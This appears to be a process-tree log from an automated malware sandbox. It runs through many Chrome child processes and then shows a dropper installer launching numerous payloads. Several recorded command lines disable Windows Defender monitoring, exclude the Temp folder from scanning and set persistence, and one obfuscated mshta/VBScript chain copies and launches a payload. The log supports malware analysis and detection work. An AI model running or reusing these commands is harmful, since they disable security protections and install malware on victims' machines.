C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7812 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7880 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7904 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7824 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8076 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=8064 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7784 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8132 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8116 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5952 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8180 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5964 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6328 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3140 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6320 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6508 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7224 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8288 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8536 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8448 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3024 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8500 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8504 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=864 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8644 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8164 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7640 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8608 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=804 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8456 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3704 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8028 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8664 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8556 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2320 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8392 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8536 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,17499996892152774841,3488099877511289302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8132 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffbb5304f50,0x7ffbb5304f60,0x7ffbb5304f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,6277451657750295980,10723761183669414074,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1736 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,6277451657750295980,10723761183669414074,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1540 /prefetch:22⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x1e41⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS439B2E89\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS439B2E89\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon0670520cb0c3aa.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS439B2E89\Mon0670520cb0c3aa.exeMon0670520cb0c3aa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\7ba8e7e8-4c3f-4bc2-a3c8-de235c3f50dd.exe"C:\Users\Admin\AppData\Local\7ba8e7e8-4c3f-4bc2-a3c8-de235c3f50dd.exe"6⤵
-
C:\Users\Admin\AppData\Local\6c041035-c020-43f3-82b5-b0255d5574d1.exe"C:\Users\Admin\AppData\Local\6c041035-c020-43f3-82b5-b0255d5574d1.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\46937137\1977665419776654.exe"C:\Users\Admin\AppData\Roaming\46937137\1977665419776654.exe"7⤵
-
C:\Users\Admin\AppData\Local\3d94e2b0-f415-4edc-85e8-8643fe3aaad0.exe"C:\Users\Admin\AppData\Local\3d94e2b0-f415-4edc-85e8-8643fe3aaad0.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\go-memexec-368068367.exeC:\Users\Admin\AppData\Local\Temp\go-memexec-368068367.exe7⤵
-
C:\Users\Admin\AppData\Local\6f79094c-0380-4fa9-b982-38b52b78b5f9.exe"C:\Users\Admin\AppData\Local\6f79094c-0380-4fa9-b982-38b52b78b5f9.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\7f4faab3-9f29-413e-a60a-eb7c0aa7ab9d.exe"C:\Users\Admin\AppData\Local\7f4faab3-9f29-413e-a60a-eb7c0aa7ab9d.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\7103258.exe"C:\Users\Admin\AppData\Roaming\7103258.exe"7⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\MzFXYO.cPl",8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\MzFXYO.cPl",9⤵
-
C:\Users\Admin\AppData\Local\bd0c88a7-19eb-4c4b-af89-27039d647e27.exe"C:\Users\Admin\AppData\Local\bd0c88a7-19eb-4c4b-af89-27039d647e27.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon0683d7983e850e7e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS439B2E89\Mon0683d7983e850e7e.exeMon0683d7983e850e7e.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\5jyIXmpsYlxSEOOiYglYcSsQ.exe"C:\Users\Admin\Pictures\Adobe Films\5jyIXmpsYlxSEOOiYglYcSsQ.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\9sU9sND47Oa54s9eUq0lRAwG.exe"C:\Users\Admin\Pictures\Adobe Films\9sU9sND47Oa54s9eUq0lRAwG.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\9sU9sND47Oa54s9eUq0lRAwG.exe"C:\Users\Admin\Pictures\Adobe Films\9sU9sND47Oa54s9eUq0lRAwG.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe"C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: cLose ( CREatEObJECT ( "wSCripT.sHeLl" ).Run ( "C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """" == """" for %e In ( ""C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe"" ) do taskkill /iM ""%~Nxe"" -f ", 0 , TrUe ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe"> ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If "" == "" for %e In ( "C:\Users\Admin\Pictures\Adobe Films\LbMjJWnDTYtozDFRzh5KAaua.exe" ) do taskkill /iM "%~Nxe" -f8⤵
-
C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "LbMjJWnDTYtozDFRzh5KAaua.exe" -f9⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\7irP2jzUbPer9_wh6FQFqCbA.exe"C:\Users\Admin\Pictures\Adobe Films\7irP2jzUbPer9_wh6FQFqCbA.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\_hDQ8so_Zv9kgTQ7wqnR96Nh.exe"C:\Users\Admin\Pictures\Adobe Films\_hDQ8so_Zv9kgTQ7wqnR96Nh.exe"6⤵
-
